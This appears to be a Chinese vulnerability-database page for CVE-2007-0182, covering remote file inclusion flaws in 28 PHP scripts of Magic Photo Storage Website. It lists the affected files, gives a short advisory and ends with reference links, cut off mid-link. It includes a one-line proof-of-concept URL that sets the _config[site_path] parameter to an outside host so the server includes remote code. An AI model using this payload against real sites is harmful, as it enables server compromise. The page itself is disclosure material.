Magic Photo Storage Website 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111973 漏洞类型 输入验证
发布时间 2007-01-09 更新时间 2007-01-14
CVE编号 CVE-2007-0182 CNNVD-ID CNNVD-200701-174
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/29434
https://cxsecurity.com/issue/WLB-2007010053
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-174
|漏洞详情
magicphotostoragewebsite中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到admin/中的(1)admin_password.php,(2)add_welcome_text.php,(3)admin_email.php,(4)add_templates.php,(5)admin_paypal_email.php,(6)approve_member.php,(7)delete_member.php,(8)index.php,(9)list_members.php,(10)membership_pricing.php或(11)send_email.php;include/中的(12)config.php或(13)db_config.php;user/中的(14)add_category.php,(15)add_news.php,(16)change_catalog_template.php,(17)couple_milestone.php,(18)couple_profile.php,(19)delete_category.php,(20)index.php,(21)login.php,(22)logout.php,(23)register.php,(24)upload_photo.php,(25)user_catelog_password.php,(26)user_email.php,(27)user_extend.php或(28)user_membership_password.php的_config[site_path]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/21965/info
                           
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
                           
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/path/user/user_membership_password.php?_config[site_path]=http://www.example2.com
|参考资料

来源:BUGTRAQ
名称:20070108magicphotostoragewebsiteMultipleRemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/456389/100/0/threaded
来源:BID
名称:21965
链接:http://www.securityfocus.com/bid/21965
来源:OSVDB
名称:33439
链接:http://www.osvdb.org/33439
来源:OSVDB
名称:33438
链接:http://www.osvdb.org/33438
来源:OSVDB
名称:33437
链接:http://www.osvdb.org/33437
来源:OSVDB
名称:33436
链接:http://www.osvdb.org/33436
来源:OSVDB
名称:33435
链接:http://www.osvdb.org/33435
来源:OSVDB
名称:33434
链接:http://www.osvdb.org/33434
来源:OSVDB
名称:33433
链接:http://www.osvdb.org/33433
来源:OSVDB
名称:33432
链接:http://www.osvdb.org/33432
来源:OSVDB
名称:33431
链接:http://www.osvdb.org/33431
来源:OSVDB
名称:33430
链接:http://www.osvdb.org/33430
来源:OSVDB
名称:33429
链接:http://www.osvdb.org/33429
来源:OSVDB
名称:33428
链接:http://www.osvdb.org/33428
来源:OSVDB
名称:33427
链接:http://www.osvdb.org/33427
来源:OSVDB
名称:33426
链接:http://www.osvdb.org/33426
来源:OSVDB
名称:33425
链接:http://www.osvdb.org/33425
来源:OSVDB
名称:33423
链接:http://www.osvdb.org/33423
来源:OSVDB
名称:33422
链接:http